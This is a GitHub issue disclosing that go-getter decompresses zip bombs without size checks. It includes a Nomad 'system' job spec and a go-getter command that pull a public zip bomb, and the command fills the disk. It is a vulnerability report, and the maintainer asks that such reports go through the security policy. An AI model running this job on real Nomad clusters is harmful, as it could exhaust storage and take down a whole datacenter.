Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Vulnerable to Zip bombs. #407

Closed
jboero opened this issue Jan 19, 2023 · 1 comment · Fixed by #412
Closed

Vulnerable to Zip bombs. #407

jboero opened this issue Jan 19, 2023 · 1 comment · Fixed by #412

Comments

@jboero
Copy link

jboero commented Jan 19, 2023

Zip bombs or compression bombs are trick archives that are custom structured to generate Terabytes of garbage (or zeros) from a small archive. It turns out go-getter's decompression options and detectors are susceptible to this. This is behaviour by design but it might be a good idea if go-getter verified an archive's size will fit in storage before decompression. This doesn't just apply to zip files but also xz, zstd, etc. Downloading a zip bomb today is actually detected and block by Chrome and some browsers to prevent you from accidentally filling your partition.

A crafty Nomad job of type "system" could instantly bring down an entire Nomad DC if the artifact is downloaded to all nodes and expanded to fill all storage. This pseudojob is missing the exec driver.

job "bomb" {
  type = "system"
  datacenters = ["dc1"]
  group "artifacts" {
    task "server" {
      artifact {
        source      = "https://www.bamsoftware.com/hacks/zipbomb/zblg.zip"
        destination = "/tmp/some-directory"
        options {
          checksum = "md5:207b597f03033b2e0644bbbc29f04053"
        }
      }
    }
  }
}

Beware zip bombs and please use caution if trying to reproduce this:
https://www.bamsoftware.com/hacks/zipbomb/

$ ~/go/bin/go-getter https://www.bamsoftware.com/hacks/zipbomb/zblg.zip /tmp/
2023/01/19 13:11:00 Error downloading: write /tmp/1: no space left on device
@picatz
Copy link
Contributor

picatz commented Jan 20, 2023

👋 Hello @jboero! In the future, please follow our documented security policy to report vulnerabilities.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

2 participants